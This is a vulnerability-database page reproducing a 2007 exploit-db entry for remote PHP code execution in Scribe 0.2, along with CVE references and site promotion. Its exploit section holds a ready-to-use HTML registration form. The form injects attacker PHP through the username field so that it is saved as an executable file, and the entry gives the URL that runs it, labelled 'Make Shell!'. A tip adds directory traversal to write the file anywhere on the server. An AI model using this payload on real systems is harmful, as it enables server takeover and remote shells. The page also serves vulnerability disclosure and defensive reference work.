Lucene search
+L

Scribe 0.2 - PHP Remote Code Execution

🗓️ 02 Nov 2007 00:00:00Reported by KiNgOfThEwOrLdType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Scribe 0.2 PHP Remote Code Execution vulnerability in the registration proces

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2007-5822
5 Nov 200719:00
cve
CVE
CVE-2007-5823
5 Nov 200719:00
cve
Cvelist
CVE-2007-5822
5 Nov 200719:00
cvelist
Cvelist
CVE-2007-5823
5 Nov 200719:00
cvelist
EUVD
EUVD-2007-5793
7 Oct 202500:30
euvd
NVD
CVE-2007-5822
5 Nov 200719:46
nvd
NVD
CVE-2007-5823
5 Nov 200719:46
nvd
Prion
Code injection
5 Nov 200719:46
prion
Prion
Directory traversal
5 Nov 200719:46
prion
---------------------------------------------------------------
 ____            __________         __             ____  __
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |
 |___|___|  /\__|  /______  /\___  >__|            |___||__|
          \/\______|      \/     \/
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

	Scribe <= 0.2 Remote PHP Code Execution
   Download: http://sourceforge.net/projects/scribe/

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC:

When we register a news user, scribe make a file called [username].php located
in /regged/. The file contains:

Username: [username]
---------------------------------------------------------------
Exploit:

<form id="Register" action="http://[target]/[scribe_path]/forum.php?act=7"
method="post">
<input maxlength="99999999999" name="username" type="text" value="<script
language=php>[YOUR_PHP_CODE]"><br>
<input maxlength="32" name="password" type="password" value="kingolo"><br>
<input maxlength="32" name="cpassword" type="password" value="kingolo"><br>
<input maxlength="50" name="email" type="text" value="kingolo"><br>
<input name="confirm" value="Make Shell!" type="submit">
</form>

Now, go on:

http://[target]/[scribe_path]/regged/<script language=php>[YOUR_PHP_CODE].php

And your code will be execute on target server!
---------------------------------------------------------------
Trick:

If you insert directory traversal variable in your username, u can save the
file where u want  ;)
---------------------------------------------------------------

# milw0rm.com [2007-11-02]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03311
28